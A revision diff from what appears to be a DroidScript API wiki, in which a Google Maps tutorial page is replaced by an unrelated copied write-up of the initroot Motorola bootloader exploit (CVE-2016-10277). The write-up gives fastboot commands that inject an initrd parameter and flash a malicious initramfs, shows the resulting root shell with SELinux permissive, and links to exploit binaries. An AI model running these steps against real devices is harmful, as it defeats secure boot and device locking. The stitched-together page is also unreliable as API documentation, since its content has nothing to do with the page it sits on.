This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision Next revision Both sides next revision | ||
built_in:start [2018/12/30 01:44] 114.125.57.28 [Built-in features - DroidScript API] |
built_in:start [2018/12/30 13:41] 182.1.63.175 [Built-in features - DroidScript API] |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | < | + | Sources: |
- | < | + | https://alephsecurity.com/2017/ |
- | < | + | https://github.com/alephsecurity/initroot |
- | < | + | |
- | /* Set the size of the div element that contains the map */ | + | initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) |
- | #map { | + | |
- | height: 400px; | + | By Roee Hay / Aleph Research, HCL Technologies |
- | width: 100%; | + | |
- | } | + | Recap of the Vulnerability |
- | </style> | + | |
- | </head> | + | 1. Vulnerable versions |
- | < | + | 2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. |
- | < | + | 3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs |
- | <!--The div element for the map --> | + | 4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. |
- | < | + | 5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. |
- | < | + | For example, here is a successful run of the exploit on cedric (Moto G5) |
- | // Initialize | + | |
- | function initMap() { | + | $ fastboot oem config fsg-id "a initrd=0xA2100000, |
- | // The location | + | $ fastboot flash aleph initroot-cedric.cpio.gz |
- | var uluru = {lat: -25.344, lng: 131.036}; | + | $ fastboot continue |
- | // The map, centered | + | |
- | var map = new google.maps.Map( | + | $ adb shell |
- | | + | cedric:/ # id |
- | // The marker, positioned at Uluru | + | uid=0(root) gid=0(root) groups=0(root), |
- | var marker | + | cedric:/ # getenforce |
- | } | + | Permissive |
- | </ | + | cedric:/ # |
- | < | + | |
- | * The async attribute allows the browser to render the page while the API loads | + | |
- | * The key parameter will contain your own API key (which is not needed for this tutorial) | + | Proof of Concept: |
- | * The callback parameter executes the initMap() function | + | https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/ |
- | | + | |
- | < | + | |
- | | + | |
- | </script> | + | |
- | </body> | + | |
- | </ | + | |
====Links==== | ====Links==== | ||
^App and Layout^ | ^App and Layout^ |